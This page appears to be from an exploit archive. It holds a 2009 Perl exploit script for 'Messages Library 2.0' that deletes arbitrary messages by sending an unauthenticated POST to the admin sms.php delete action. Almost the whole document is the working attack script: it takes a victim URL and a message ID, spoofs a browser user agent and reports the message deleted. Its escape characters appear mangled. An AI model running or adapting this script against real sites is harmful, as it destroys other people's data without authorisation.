[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Messages Library 2.0 Arbitrary Delete Message Vulnerability
# Published : 2009-07-01
# Author : Stack
# Previous Title : Rentventory Multiple Remote SQL Injection Vulnerabilities
# Next Title : Messages Library 2.0 Insecure Cookie Handling Vulnerability
#!/usr/bin/perl -w
# Messages Library 2.0 <= Arbitrary Delete Message
########################################
#[*] Founded & Exploited by : Stack
########################################
print "tt############################################################nn";
print "tt# Messages Library 2.0 <= Arbitrary Delete Message #nn";
print "tt# by Stack #nn";
print "tt############################################################nn";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/n" unless @ARGV;
print "n[!] ContactID : ";
chomp(my $id=<STDIN>);
$b = LWP::UserAgent->new() or die "Could not initialize browsern";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id."";
$res = $b->request(HTTP::Request->new(POST=>$host));
print "nBrought to you by v4-team.com...n";
print "n[+] Message Deleted n";
# www.Syue.com [2009-07-01]